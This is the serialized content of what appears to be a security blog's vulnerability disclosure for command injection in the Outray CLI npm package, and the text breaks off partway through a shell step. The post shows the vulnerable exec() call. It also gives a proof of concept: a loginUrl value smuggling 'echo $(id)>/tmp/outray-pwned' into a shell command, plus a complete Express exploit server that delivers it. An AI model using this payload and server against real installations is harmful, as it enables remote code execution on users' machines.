[{"data":1,"prerenderedAt":1523},["Reactive",2],{"blog-post-/blogs/outray_0.1.5_os_command_injection":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":8,"date":9,"image":10,"alt":8,"ogImage":10,"tags":11,"published":14,"body":15,"_type":1515,"_id":1516,"_source":1517,"_file":1518,"_extension":1519,"sitemap":1520},"/blogs/outray_0.1.5_os_command_injection","blogs",false,"","Outray-Tunnel Outray \u003C= 0.1.5 - OS command Injection","12th Jan 2026","https://hacklab.eu.org/blogs-img/outray.png",[12,13],"CVE","Open Source",true,{"type":16,"children":17,"toc":1503},"root",[18,26,33,47,60,66,72,78,87,107,481,492,498,508,651,656,1263,1268,1320,1325,1392,1409,1418,1424,1449,1455,1497],{"type":19,"tag":20,"props":21,"children":23},"element","h2",{"id":22},"outray-tunnel-outray-015-os-command-injection",[24],{"type":25,"value":8},"text",{"type":19,"tag":27,"props":28,"children":30},"h4",{"id":29},"category-cve",[31],{"type":25,"value":32},"Category: CVE",{"type":19,"tag":27,"props":34,"children":36},{"id":35},"researcher-s33k3r-senseixenus",[37,39],{"type":25,"value":38},"Researcher: S33K3R, ",{"type":19,"tag":40,"props":41,"children":44},"a",{"href":42,"target":43},"https://github.com/SENSEiXENUS","_blank",[45],{"type":25,"value":46},"SENSEiXENUS",{"type":19,"tag":48,"props":49,"children":51},"h3",{"id":50},"source-code-github-link",[52,54],{"type":25,"value":53},"Source code: ",{"type":19,"tag":40,"props":55,"children":57},{"href":56,"target":43},"https://github.com/outray-tunnel",[58],{"type":25,"value":59},"(github link)",{"type":19,"tag":48,"props":61,"children":63},{"id":62},"tl-dr",[64],{"type":25,"value":65},"TL; DR",{"type":19,"tag":67,"props":68,"children":69},"p",{},[70],{"type":25,"value":71},"An arbitrary command injection vulnerability exists in the Outray CLI (npm package) login command due to unsafe usage of the Node.js exec function in apps/cli/src/auth.ts. The application fails to sanitize user-supplied URLs retrieved from the OUTRAY_WEB_URL endpoint before interpolating them into shell commands (using open, start, or xdg-open). Remote Code Execution (RCE) occurs when the application processes a malicious JSON response containing shell metacharacters in the loginUrl field.",{"type":19,"tag":48,"props":73,"children":75},{"id":74},"details",[76],{"type":25,"value":77},"Details",{"type":19,"tag":67,"props":79,"children":80},{},[81],{"type":19,"tag":82,"props":83,"children":84},"strong",{},[85],{"type":25,"value":86},"Root Cause:",{"type":19,"tag":67,"props":88,"children":89},{},[90,92,98,100,105],{"type":25,"value":91},"The vulnerability exists in ",{"type":19,"tag":93,"props":94,"children":95},"code",{"className":7},[96],{"type":25,"value":97},"apps/cli/src/auth.ts",{"type":25,"value":99}," in the ",{"type":19,"tag":93,"props":101,"children":102},{"className":7},[103],{"type":25,"value":104},"openBrowser()",{"type":25,"value":106}," method.",{"type":19,"tag":108,"props":109,"children":113},"pre",{"className":110,"code":111,"language":112,"meta":7,"style":7},"language-ts shiki shiki-themes dracula","openBrowser(url: string): void {\n    const platform = process.platform;\n    const command =\n      platform === \"darwin\"\n        ? `open \"${url}\"`\n        : platform === \"win32\"\n          ? `cmd /c start \"\" \"${url}\"`\n          : `xdg-open \"${url}\"`;\n\n    exec(command, (error) => {\n      if (error) {\n        console.log(chalk.yellow(\"⚠️  Could not open browser automatically\"));\n      }\n    });\n  }\n","ts",[114],{"type":19,"tag":93,"props":115,"children":116},{"__ignoreMap":7},[117,146,170,188,219,253,283,313,349,358,392,406,454,463,472],{"type":19,"tag":118,"props":119,"children":122},"span",{"class":120,"line":121},"line",1,[123,129,135,141],{"type":19,"tag":118,"props":124,"children":126},{"style":125},"--shiki-default:#50FA7B",[127],{"type":25,"value":128},"openBrowser",{"type":19,"tag":118,"props":130,"children":132},{"style":131},"--shiki-default:#F8F8F2",[133],{"type":25,"value":134},"(url: string): ",{"type":19,"tag":118,"props":136,"children":138},{"style":137},"--shiki-default:#FF79C6",[139],{"type":25,"value":140},"void",{"type":19,"tag":118,"props":142,"children":143},{"style":131},[144],{"type":25,"value":145}," {\n",{"type":19,"tag":118,"props":147,"children":149},{"class":120,"line":148},2,[150,155,160,165],{"type":19,"tag":118,"props":151,"children":152},{"style":137},[153],{"type":25,"value":154},"    const",{"type":19,"tag":118,"props":156,"children":157},{"style":131},[158],{"type":25,"value":159}," platform ",{"type":19,"tag":118,"props":161,"children":162},{"style":137},[163],{"type":25,"value":164},"=",{"type":19,"tag":118,"props":166,"children":167},{"style":131},[168],{"type":25,"value":169}," process.platform;\n",{"type":19,"tag":118,"props":171,"children":173},{"class":120,"line":172},3,[174,178,183],{"type":19,"tag":118,"props":175,"children":176},{"style":137},[177],{"type":25,"value":154},{"type":19,"tag":118,"props":179,"children":180},{"style":131},[181],{"type":25,"value":182}," command ",{"type":19,"tag":118,"props":184,"children":185},{"style":137},[186],{"type":25,"value":187},"=\n",{"type":19,"tag":118,"props":189,"children":191},{"class":120,"line":190},4,[192,197,202,208,214],{"type":19,"tag":118,"props":193,"children":194},{"style":131},[195],{"type":25,"value":196},"      platform ",{"type":19,"tag":118,"props":198,"children":199},{"style":137},[200],{"type":25,"value":201},"===",{"type":19,"tag":118,"props":203,"children":205},{"style":204},"--shiki-default:#E9F284",[206],{"type":25,"value":207}," \"",{"type":19,"tag":118,"props":209,"children":211},{"style":210},"--shiki-default:#F1FA8C",[212],{"type":25,"value":213},"darwin",{"type":19,"tag":118,"props":215,"children":216},{"style":204},[217],{"type":25,"value":218},"\"\n",{"type":19,"tag":118,"props":220,"children":222},{"class":120,"line":221},5,[223,228,233,238,243,248],{"type":19,"tag":118,"props":224,"children":225},{"style":137},[226],{"type":25,"value":227},"        ?",{"type":19,"tag":118,"props":229,"children":230},{"style":210},[231],{"type":25,"value":232}," `open \"",{"type":19,"tag":118,"props":234,"children":235},{"style":137},[236],{"type":25,"value":237},"${",{"type":19,"tag":118,"props":239,"children":240},{"style":131},[241],{"type":25,"value":242},"url",{"type":19,"tag":118,"props":244,"children":245},{"style":137},[246],{"type":25,"value":247},"}",{"type":19,"tag":118,"props":249,"children":250},{"style":210},[251],{"type":25,"value":252},"\"`\n",{"type":19,"tag":118,"props":254,"children":256},{"class":120,"line":255},6,[257,262,266,270,274,279],{"type":19,"tag":118,"props":258,"children":259},{"style":137},[260],{"type":25,"value":261},"        :",{"type":19,"tag":118,"props":263,"children":264},{"style":131},[265],{"type":25,"value":159},{"type":19,"tag":118,"props":267,"children":268},{"style":137},[269],{"type":25,"value":201},{"type":19,"tag":118,"props":271,"children":272},{"style":204},[273],{"type":25,"value":207},{"type":19,"tag":118,"props":275,"children":276},{"style":210},[277],{"type":25,"value":278},"win32",{"type":19,"tag":118,"props":280,"children":281},{"style":204},[282],{"type":25,"value":218},{"type":19,"tag":118,"props":284,"children":286},{"class":120,"line":285},7,[287,292,297,301,305,309],{"type":19,"tag":118,"props":288,"children":289},{"style":137},[290],{"type":25,"value":291},"          ?",{"type":19,"tag":118,"props":293,"children":294},{"style":210},[295],{"type":25,"value":296}," `cmd /c start \"\" \"",{"type":19,"tag":118,"props":298,"children":299},{"style":137},[300],{"type":25,"value":237},{"type":19,"tag":118,"props":302,"children":303},{"style":131},[304],{"type":25,"value":242},{"type":19,"tag":118,"props":306,"children":307},{"style":137},[308],{"type":25,"value":247},{"type":19,"tag":118,"props":310,"children":311},{"style":210},[312],{"type":25,"value":252},{"type":19,"tag":118,"props":314,"children":316},{"class":120,"line":315},8,[317,322,327,331,335,339,344],{"type":19,"tag":118,"props":318,"children":319},{"style":137},[320],{"type":25,"value":321},"          :",{"type":19,"tag":118,"props":323,"children":324},{"style":210},[325],{"type":25,"value":326}," `xdg-open \"",{"type":19,"tag":118,"props":328,"children":329},{"style":137},[330],{"type":25,"value":237},{"type":19,"tag":118,"props":332,"children":333},{"style":131},[334],{"type":25,"value":242},{"type":19,"tag":118,"props":336,"children":337},{"style":137},[338],{"type":25,"value":247},{"type":19,"tag":118,"props":340,"children":341},{"style":210},[342],{"type":25,"value":343},"\"`",{"type":19,"tag":118,"props":345,"children":346},{"style":131},[347],{"type":25,"value":348},";\n",{"type":19,"tag":118,"props":350,"children":352},{"class":120,"line":351},9,[353],{"type":19,"tag":118,"props":354,"children":355},{"emptyLinePlaceholder":14},[356],{"type":25,"value":357},"\n",{"type":19,"tag":118,"props":359,"children":361},{"class":120,"line":360},10,[362,367,372,378,383,388],{"type":19,"tag":118,"props":363,"children":364},{"style":125},[365],{"type":25,"value":366},"    exec",{"type":19,"tag":118,"props":368,"children":369},{"style":131},[370],{"type":25,"value":371},"(command, (",{"type":19,"tag":118,"props":373,"children":375},{"style":374},"--shiki-default:#FFB86C;--shiki-default-font-style:italic",[376],{"type":25,"value":377},"error",{"type":19,"tag":118,"props":379,"children":380},{"style":131},[381],{"type":25,"value":382},") ",{"type":19,"tag":118,"props":384,"children":385},{"style":137},[386],{"type":25,"value":387},"=>",{"type":19,"tag":118,"props":389,"children":390},{"style":131},[391],{"type":25,"value":145},{"type":19,"tag":118,"props":393,"children":395},{"class":120,"line":394},11,[396,401],{"type":19,"tag":118,"props":397,"children":398},{"style":137},[399],{"type":25,"value":400},"      if",{"type":19,"tag":118,"props":402,"children":403},{"style":131},[404],{"type":25,"value":405}," (error) {\n",{"type":19,"tag":118,"props":407,"children":409},{"class":120,"line":408},12,[410,415,420,425,430,435,440,445,449],{"type":19,"tag":118,"props":411,"children":412},{"style":131},[413],{"type":25,"value":414},"        console.",{"type":19,"tag":118,"props":416,"children":417},{"style":125},[418],{"type":25,"value":419},"log",{"type":19,"tag":118,"props":421,"children":422},{"style":131},[423],{"type":25,"value":424},"(chalk.",{"type":19,"tag":118,"props":426,"children":427},{"style":125},[428],{"type":25,"value":429},"yellow",{"type":19,"tag":118,"props":431,"children":432},{"style":131},[433],{"type":25,"value":434},"(",{"type":19,"tag":118,"props":436,"children":437},{"style":204},[438],{"type":25,"value":439},"\"",{"type":19,"tag":118,"props":441,"children":442},{"style":210},[443],{"type":25,"value":444},"⚠️  Could not open browser automatically",{"type":19,"tag":118,"props":446,"children":447},{"style":204},[448],{"type":25,"value":439},{"type":19,"tag":118,"props":450,"children":451},{"style":131},[452],{"type":25,"value":453},"));\n",{"type":19,"tag":118,"props":455,"children":457},{"class":120,"line":456},13,[458],{"type":19,"tag":118,"props":459,"children":460},{"style":131},[461],{"type":25,"value":462},"      }\n",{"type":19,"tag":118,"props":464,"children":466},{"class":120,"line":465},14,[467],{"type":19,"tag":118,"props":468,"children":469},{"style":131},[470],{"type":25,"value":471},"    });\n",{"type":19,"tag":118,"props":473,"children":475},{"class":120,"line":474},15,[476],{"type":19,"tag":118,"props":477,"children":478},{"style":131},[479],{"type":25,"value":480},"  }\n",{"type":19,"tag":67,"props":482,"children":483},{},[484,486,490],{"type":25,"value":485},"The ",{"type":19,"tag":93,"props":487,"children":488},{"className":7},[489],{"type":25,"value":242},{"type":25,"value":491}," parameter is directly interpolated into shell commands without proper sanitization, allowing command injection through malicious response.",{"type":19,"tag":48,"props":493,"children":495},{"id":494},"poc-payload-vary-by-os",[496],{"type":25,"value":497},"PoC (Payload vary by OS)",{"type":19,"tag":67,"props":499,"children":500},{},[501,503],{"type":25,"value":502},"Create exploit server that returns this json on fetching ",{"type":19,"tag":93,"props":504,"children":505},{"className":7},[506],{"type":25,"value":507},"/api/cli/login",{"type":19,"tag":108,"props":509,"children":513},{"className":510,"code":511,"language":512,"meta":7,"style":7},"language-json shiki shiki-themes dracula","{\n  \"loginUrl\": \"https://outray2shell.lol\\\";echo $(id)>/tmp/outray-pwned\\\"\",\n  \"code\": \"anything\",\n  \"expiresIn\": 3600\n}\n","json",[514],{"type":19,"tag":93,"props":515,"children":516},{"__ignoreMap":7},[517,525,581,617,643],{"type":19,"tag":118,"props":518,"children":519},{"class":120,"line":121},[520],{"type":19,"tag":118,"props":521,"children":522},{"style":131},[523],{"type":25,"value":524},"{\n",{"type":19,"tag":118,"props":526,"children":527},{"class":120,"line":148},[528,534,540,544,549,553,558,563,568,572,576],{"type":19,"tag":118,"props":529,"children":531},{"style":530},"--shiki-default:#8BE9FE",[532],{"type":25,"value":533},"  \"",{"type":19,"tag":118,"props":535,"children":537},{"style":536},"--shiki-default:#8BE9FD",[538],{"type":25,"value":539},"loginUrl",{"type":19,"tag":118,"props":541,"children":542},{"style":530},[543],{"type":25,"value":439},{"type":19,"tag":118,"props":545,"children":546},{"style":137},[547],{"type":25,"value":548},":",{"type":19,"tag":118,"props":550,"children":551},{"style":204},[552],{"type":25,"value":207},{"type":19,"tag":118,"props":554,"children":555},{"style":210},[556],{"type":25,"value":557},"https://outray2shell.lol",{"type":19,"tag":118,"props":559,"children":560},{"style":137},[561],{"type":25,"value":562},"\\\"",{"type":19,"tag":118,"props":564,"children":565},{"style":210},[566],{"type":25,"value":567},";echo $(id)>/tmp/outray-pwned",{"type":19,"tag":118,"props":569,"children":570},{"style":137},[571],{"type":25,"value":562},{"type":19,"tag":118,"props":573,"children":574},{"style":204},[575],{"type":25,"value":439},{"type":19,"tag":118,"props":577,"children":578},{"style":131},[579],{"type":25,"value":580},",\n",{"type":19,"tag":118,"props":582,"children":583},{"class":120,"line":172},[584,588,592,596,600,604,609,613],{"type":19,"tag":118,"props":585,"children":586},{"style":530},[587],{"type":25,"value":533},{"type":19,"tag":118,"props":589,"children":590},{"style":536},[591],{"type":25,"value":93},{"type":19,"tag":118,"props":593,"children":594},{"style":530},[595],{"type":25,"value":439},{"type":19,"tag":118,"props":597,"children":598},{"style":137},[599],{"type":25,"value":548},{"type":19,"tag":118,"props":601,"children":602},{"style":204},[603],{"type":25,"value":207},{"type":19,"tag":118,"props":605,"children":606},{"style":210},[607],{"type":25,"value":608},"anything",{"type":19,"tag":118,"props":610,"children":611},{"style":204},[612],{"type":25,"value":439},{"type":19,"tag":118,"props":614,"children":615},{"style":131},[616],{"type":25,"value":580},{"type":19,"tag":118,"props":618,"children":619},{"class":120,"line":190},[620,624,629,633,637],{"type":19,"tag":118,"props":621,"children":622},{"style":530},[623],{"type":25,"value":533},{"type":19,"tag":118,"props":625,"children":626},{"style":536},[627],{"type":25,"value":628},"expiresIn",{"type":19,"tag":118,"props":630,"children":631},{"style":530},[632],{"type":25,"value":439},{"type":19,"tag":118,"props":634,"children":635},{"style":137},[636],{"type":25,"value":548},{"type":19,"tag":118,"props":638,"children":640},{"style":639},"--shiki-default:#BD93F9",[641],{"type":25,"value":642}," 3600\n",{"type":19,"tag":118,"props":644,"children":645},{"class":120,"line":221},[646],{"type":19,"tag":118,"props":647,"children":648},{"style":131},[649],{"type":25,"value":650},"}\n",{"type":19,"tag":67,"props":652,"children":653},{},[654],{"type":25,"value":655},"(Using express here)",{"type":19,"tag":108,"props":657,"children":661},{"className":658,"code":659,"language":660,"meta":7,"style":7},"language-js shiki shiki-themes dracula","const express = require('express');\nconst app = express();\n\napp.use(express.json());\napp.use((req, res, next) => {\n  console.log(`${req.method} ${req.url}`);\n  next();\n});\n\napp.post('/api/cli/login', (req, res) => {\n  console.log('Login endpoint hit - sending malicious payload');\n  res.json({\n    loginUrl: 'https://outray2shell.lol\";echo $(whoami)>/tmp/outray-pwned\"',\n    code: 'anything',\n    expiresIn: 3600\n  });\n});\n\nconst port = 3001;\napp.listen(port, '0.0.0.0', () => {\n  console.log(`Exploit Server running on http://0.0.0.0:${port}`);\n  console.log('Payload: echo $(whoami)>/tmp/outray-pwned\"');\n});\n","js",[662],{"type":19,"tag":93,"props":663,"children":664},{"__ignoreMap":7},[665,710,736,743,770,822,878,890,898,905,962,994,1011,1041,1069,1085,1094,1102,1110,1136,1180,1222,1255],{"type":19,"tag":118,"props":666,"children":667},{"class":120,"line":121},[668,673,678,682,687,691,696,701,705],{"type":19,"tag":118,"props":669,"children":670},{"style":137},[671],{"type":25,"value":672},"const",{"type":19,"tag":118,"props":674,"children":675},{"style":131},[676],{"type":25,"value":677}," express ",{"type":19,"tag":118,"props":679,"children":680},{"style":137},[681],{"type":25,"value":164},{"type":19,"tag":118,"props":683,"children":684},{"style":125},[685],{"type":25,"value":686}," require",{"type":19,"tag":118,"props":688,"children":689},{"style":131},[690],{"type":25,"value":434},{"type":19,"tag":118,"props":692,"children":693},{"style":204},[694],{"type":25,"value":695},"'",{"type":19,"tag":118,"props":697,"children":698},{"style":210},[699],{"type":25,"value":700},"express",{"type":19,"tag":118,"props":702,"children":703},{"style":204},[704],{"type":25,"value":695},{"type":19,"tag":118,"props":706,"children":707},{"style":131},[708],{"type":25,"value":709},");\n",{"type":19,"tag":118,"props":711,"children":712},{"class":120,"line":148},[713,717,722,726,731],{"type":19,"tag":118,"props":714,"children":715},{"style":137},[716],{"type":25,"value":672},{"type":19,"tag":118,"props":718,"children":719},{"style":131},[720],{"type":25,"value":721}," app ",{"type":19,"tag":118,"props":723,"children":724},{"style":137},[725],{"type":25,"value":164},{"type":19,"tag":118,"props":727,"children":728},{"style":125},[729],{"type":25,"value":730}," express",{"type":19,"tag":118,"props":732,"children":733},{"style":131},[734],{"type":25,"value":735},"();\n",{"type":19,"tag":118,"props":737,"children":738},{"class":120,"line":172},[739],{"type":19,"tag":118,"props":740,"children":741},{"emptyLinePlaceholder":14},[742],{"type":25,"value":357},{"type":19,"tag":118,"props":744,"children":745},{"class":120,"line":190},[746,751,756,761,765],{"type":19,"tag":118,"props":747,"children":748},{"style":131},[749],{"type":25,"value":750},"app.",{"type":19,"tag":118,"props":752,"children":753},{"style":125},[754],{"type":25,"value":755},"use",{"type":19,"tag":118,"props":757,"children":758},{"style":131},[759],{"type":25,"value":760},"(express.",{"type":19,"tag":118,"props":762,"children":763},{"style":125},[764],{"type":25,"value":512},{"type":19,"tag":118,"props":766,"children":767},{"style":131},[768],{"type":25,"value":769},"());\n",{"type":19,"tag":118,"props":771,"children":772},{"class":120,"line":221},[773,777,781,786,791,796,801,805,810,814,818],{"type":19,"tag":118,"props":774,"children":775},{"style":131},[776],{"type":25,"value":750},{"type":19,"tag":118,"props":778,"children":779},{"style":125},[780],{"type":25,"value":755},{"type":19,"tag":118,"props":782,"children":783},{"style":131},[784],{"type":25,"value":785},"((",{"type":19,"tag":118,"props":787,"children":788},{"style":374},[789],{"type":25,"value":790},"req",{"type":19,"tag":118,"props":792,"children":793},{"style":131},[794],{"type":25,"value":795},", ",{"type":19,"tag":118,"props":797,"children":798},{"style":374},[799],{"type":25,"value":800},"res",{"type":19,"tag":118,"props":802,"children":803},{"style":131},[804],{"type":25,"value":795},{"type":19,"tag":118,"props":806,"children":807},{"style":374},[808],{"type":25,"value":809},"next",{"type":19,"tag":118,"props":811,"children":812},{"style":131},[813],{"type":25,"value":382},{"type":19,"tag":118,"props":815,"children":816},{"style":137},[817],{"type":25,"value":387},{"type":19,"tag":118,"props":819,"children":820},{"style":131},[821],{"type":25,"value":145},{"type":19,"tag":118,"props":823,"children":824},{"class":120,"line":255},[825,830,834,838,843,847,852,856,861,866,870,874],{"type":19,"tag":118,"props":826,"children":827},{"style":131},[828],{"type":25,"value":829},"  console.",{"type":19,"tag":118,"props":831,"children":832},{"style":125},[833],{"type":25,"value":419},{"type":19,"tag":118,"props":835,"children":836},{"style":131},[837],{"type":25,"value":434},{"type":19,"tag":118,"props":839,"children":840},{"style":210},[841],{"type":25,"value":842},"`",{"type":19,"tag":118,"props":844,"children":845},{"style":137},[846],{"type":25,"value":237},{"type":19,"tag":118,"props":848,"children":849},{"style":131},[850],{"type":25,"value":851},"req.method",{"type":19,"tag":118,"props":853,"children":854},{"style":137},[855],{"type":25,"value":247},{"type":19,"tag":118,"props":857,"children":858},{"style":137},[859],{"type":25,"value":860}," ${",{"type":19,"tag":118,"props":862,"children":863},{"style":131},[864],{"type":25,"value":865},"req.url",{"type":19,"tag":118,"props":867,"children":868},{"style":137},[869],{"type":25,"value":247},{"type":19,"tag":118,"props":871,"children":872},{"style":210},[873],{"type":25,"value":842},{"type":19,"tag":118,"props":875,"children":876},{"style":131},[877],{"type":25,"value":709},{"type":19,"tag":118,"props":879,"children":880},{"class":120,"line":285},[881,886],{"type":19,"tag":118,"props":882,"children":883},{"style":125},[884],{"type":25,"value":885},"  next",{"type":19,"tag":118,"props":887,"children":888},{"style":131},[889],{"type":25,"value":735},{"type":19,"tag":118,"props":891,"children":892},{"class":120,"line":315},[893],{"type":19,"tag":118,"props":894,"children":895},{"style":131},[896],{"type":25,"value":897},"});\n",{"type":19,"tag":118,"props":899,"children":900},{"class":120,"line":351},[901],{"type":19,"tag":118,"props":902,"children":903},{"emptyLinePlaceholder":14},[904],{"type":25,"value":357},{"type":19,"tag":118,"props":906,"children":907},{"class":120,"line":360},[908,912,917,921,925,929,933,938,942,946,950,954,958],{"type":19,"tag":118,"props":909,"children":910},{"style":131},[911],{"type":25,"value":750},{"type":19,"tag":118,"props":913,"children":914},{"style":125},[915],{"type":25,"value":916},"post",{"type":19,"tag":118,"props":918,"children":919},{"style":131},[920],{"type":25,"value":434},{"type":19,"tag":118,"props":922,"children":923},{"style":204},[924],{"type":25,"value":695},{"type":19,"tag":118,"props":926,"children":927},{"style":210},[928],{"type":25,"value":507},{"type":19,"tag":118,"props":930,"children":931},{"style":204},[932],{"type":25,"value":695},{"type":19,"tag":118,"props":934,"children":935},{"style":131},[936],{"type":25,"value":937},", (",{"type":19,"tag":118,"props":939,"children":940},{"style":374},[941],{"type":25,"value":790},{"type":19,"tag":118,"props":943,"children":944},{"style":131},[945],{"type":25,"value":795},{"type":19,"tag":118,"props":947,"children":948},{"style":374},[949],{"type":25,"value":800},{"type":19,"tag":118,"props":951,"children":952},{"style":131},[953],{"type":25,"value":382},{"type":19,"tag":118,"props":955,"children":956},{"style":137},[957],{"type":25,"value":387},{"type":19,"tag":118,"props":959,"children":960},{"style":131},[961],{"type":25,"value":145},{"type":19,"tag":118,"props":963,"children":964},{"class":120,"line":394},[965,969,973,977,981,986,990],{"type":19,"tag":118,"props":966,"children":967},{"style":131},[968],{"type":25,"value":829},{"type":19,"tag":118,"props":970,"children":971},{"style":125},[972],{"type":25,"value":419},{"type":19,"tag":118,"props":974,"children":975},{"style":131},[976],{"type":25,"value":434},{"type":19,"tag":118,"props":978,"children":979},{"style":204},[980],{"type":25,"value":695},{"type":19,"tag":118,"props":982,"children":983},{"style":210},[984],{"type":25,"value":985},"Login endpoint hit - sending malicious payload",{"type":19,"tag":118,"props":987,"children":988},{"style":204},[989],{"type":25,"value":695},{"type":19,"tag":118,"props":991,"children":992},{"style":131},[993],{"type":25,"value":709},{"type":19,"tag":118,"props":995,"children":996},{"class":120,"line":408},[997,1002,1006],{"type":19,"tag":118,"props":998,"children":999},{"style":131},[1000],{"type":25,"value":1001},"  res.",{"type":19,"tag":118,"props":1003,"children":1004},{"style":125},[1005],{"type":25,"value":512},{"type":19,"tag":118,"props":1007,"children":1008},{"style":131},[1009],{"type":25,"value":1010},"({\n",{"type":19,"tag":118,"props":1012,"children":1013},{"class":120,"line":456},[1014,1019,1023,1028,1033,1037],{"type":19,"tag":118,"props":1015,"children":1016},{"style":131},[1017],{"type":25,"value":1018},"    loginUrl",{"type":19,"tag":118,"props":1020,"children":1021},{"style":137},[1022],{"type":25,"value":548},{"type":19,"tag":118,"props":1024,"children":1025},{"style":204},[1026],{"type":25,"value":1027}," '",{"type":19,"tag":118,"props":1029,"children":1030},{"style":210},[1031],{"type":25,"value":1032},"https://outray2shell.lol\";echo $(whoami)>/tmp/outray-pwned\"",{"type":19,"tag":118,"props":1034,"children":1035},{"style":204},[1036],{"type":25,"value":695},{"type":19,"tag":118,"props":1038,"children":1039},{"style":131},[1040],{"type":25,"value":580},{"type":19,"tag":118,"props":1042,"children":1043},{"class":120,"line":465},[1044,1049,1053,1057,1061,1065],{"type":19,"tag":118,"props":1045,"children":1046},{"style":131},[1047],{"type":25,"value":1048},"    code",{"type":19,"tag":118,"props":1050,"children":1051},{"style":137},[1052],{"type":25,"value":548},{"type":19,"tag":118,"props":1054,"children":1055},{"style":204},[1056],{"type":25,"value":1027},{"type":19,"tag":118,"props":1058,"children":1059},{"style":210},[1060],{"type":25,"value":608},{"type":19,"tag":118,"props":1062,"children":1063},{"style":204},[1064],{"type":25,"value":695},{"type":19,"tag":118,"props":1066,"children":1067},{"style":131},[1068],{"type":25,"value":580},{"type":19,"tag":118,"props":1070,"children":1071},{"class":120,"line":474},[1072,1077,1081],{"type":19,"tag":118,"props":1073,"children":1074},{"style":131},[1075],{"type":25,"value":1076},"    expiresIn",{"type":19,"tag":118,"props":1078,"children":1079},{"style":137},[1080],{"type":25,"value":548},{"type":19,"tag":118,"props":1082,"children":1083},{"style":639},[1084],{"type":25,"value":642},{"type":19,"tag":118,"props":1086,"children":1088},{"class":120,"line":1087},16,[1089],{"type":19,"tag":118,"props":1090,"children":1091},{"style":131},[1092],{"type":25,"value":1093},"  });\n",{"type":19,"tag":118,"props":1095,"children":1097},{"class":120,"line":1096},17,[1098],{"type":19,"tag":118,"props":1099,"children":1100},{"style":131},[1101],{"type":25,"value":897},{"type":19,"tag":118,"props":1103,"children":1105},{"class":120,"line":1104},18,[1106],{"type":19,"tag":118,"props":1107,"children":1108},{"emptyLinePlaceholder":14},[1109],{"type":25,"value":357},{"type":19,"tag":118,"props":1111,"children":1113},{"class":120,"line":1112},19,[1114,1118,1123,1127,1132],{"type":19,"tag":118,"props":1115,"children":1116},{"style":137},[1117],{"type":25,"value":672},{"type":19,"tag":118,"props":1119,"children":1120},{"style":131},[1121],{"type":25,"value":1122}," port ",{"type":19,"tag":118,"props":1124,"children":1125},{"style":137},[1126],{"type":25,"value":164},{"type":19,"tag":118,"props":1128,"children":1129},{"style":639},[1130],{"type":25,"value":1131}," 3001",{"type":19,"tag":118,"props":1133,"children":1134},{"style":131},[1135],{"type":25,"value":348},{"type":19,"tag":118,"props":1137,"children":1139},{"class":120,"line":1138},20,[1140,1144,1149,1154,1158,1163,1167,1172,1176],{"type":19,"tag":118,"props":1141,"children":1142},{"style":131},[1143],{"type":25,"value":750},{"type":19,"tag":118,"props":1145,"children":1146},{"style":125},[1147],{"type":25,"value":1148},"listen",{"type":19,"tag":118,"props":1150,"children":1151},{"style":131},[1152],{"type":25,"value":1153},"(port, ",{"type":19,"tag":118,"props":1155,"children":1156},{"style":204},[1157],{"type":25,"value":695},{"type":19,"tag":118,"props":1159,"children":1160},{"style":210},[1161],{"type":25,"value":1162},"0.0.0.0",{"type":19,"tag":118,"props":1164,"children":1165},{"style":204},[1166],{"type":25,"value":695},{"type":19,"tag":118,"props":1168,"children":1169},{"style":131},[1170],{"type":25,"value":1171},", () ",{"type":19,"tag":118,"props":1173,"children":1174},{"style":137},[1175],{"type":25,"value":387},{"type":19,"tag":118,"props":1177,"children":1178},{"style":131},[1179],{"type":25,"value":145},{"type":19,"tag":118,"props":1181,"children":1183},{"class":120,"line":1182},21,[1184,1188,1192,1196,1201,1205,1210,1214,1218],{"type":19,"tag":118,"props":1185,"children":1186},{"style":131},[1187],{"type":25,"value":829},{"type":19,"tag":118,"props":1189,"children":1190},{"style":125},[1191],{"type":25,"value":419},{"type":19,"tag":118,"props":1193,"children":1194},{"style":131},[1195],{"type":25,"value":434},{"type":19,"tag":118,"props":1197,"children":1198},{"style":210},[1199],{"type":25,"value":1200},"`Exploit Server running on http://0.0.0.0:",{"type":19,"tag":118,"props":1202,"children":1203},{"style":137},[1204],{"type":25,"value":237},{"type":19,"tag":118,"props":1206,"children":1207},{"style":131},[1208],{"type":25,"value":1209},"port",{"type":19,"tag":118,"props":1211,"children":1212},{"style":137},[1213],{"type":25,"value":247},{"type":19,"tag":118,"props":1215,"children":1216},{"style":210},[1217],{"type":25,"value":842},{"type":19,"tag":118,"props":1219,"children":1220},{"style":131},[1221],{"type":25,"value":709},{"type":19,"tag":118,"props":1223,"children":1225},{"class":120,"line":1224},22,[1226,1230,1234,1238,1242,1247,1251],{"type":19,"tag":118,"props":1227,"children":1228},{"style":131},[1229],{"type":25,"value":829},{"type":19,"tag":118,"props":1231,"children":1232},{"style":125},[1233],{"type":25,"value":419},{"type":19,"tag":118,"props":1235,"children":1236},{"style":131},[1237],{"type":25,"value":434},{"type":19,"tag":118,"props":1239,"children":1240},{"style":204},[1241],{"type":25,"value":695},{"type":19,"tag":118,"props":1243,"children":1244},{"style":210},[1245],{"type":25,"value":1246},"Payload: echo $(whoami)>/tmp/outray-pwned\"",{"type":19,"tag":118,"props":1248,"children":1249},{"style":204},[1250],{"type":25,"value":695},{"type":19,"tag":118,"props":1252,"children":1253},{"style":131},[1254],{"type":25,"value":709},{"type":19,"tag":118,"props":1256,"children":1258},{"class":120,"line":1257},23,[1259],{"type":19,"tag":118,"props":1260,"children":1261},{"style":131},[1262],{"type":25,"value":897},{"type":19,"tag":67,"props":1264,"children":1265},{},[1266],{"type":25,"value":1267},"Next, command injection:",{"type":19,"tag":108,"props":1269,"children":1273},{"className":1270,"code":1271,"language":1272,"meta":7,"style":7},"language-bash shiki shiki-themes dracula","export OUTRAY_WEB_URL=\"http://127.0.0.1:3001\"\noutray login\n","bash",[1274],{"type":19,"tag":93,"props":1275,"children":1276},{"__ignoreMap":7},[1277,1307],{"type":19,"tag":118,"props":1278,"children":1279},{"class":120,"line":121},[1280,1285,1290,1294,1298,1303],{"type":19,"tag":118,"props":1281,"children":1282},{"style":137},[1283],{"type":25,"value":1284},"export",{"type":19,"tag":118,"props":1286,"children":1287},{"style":639},[1288],{"type":25,"value":1289}," 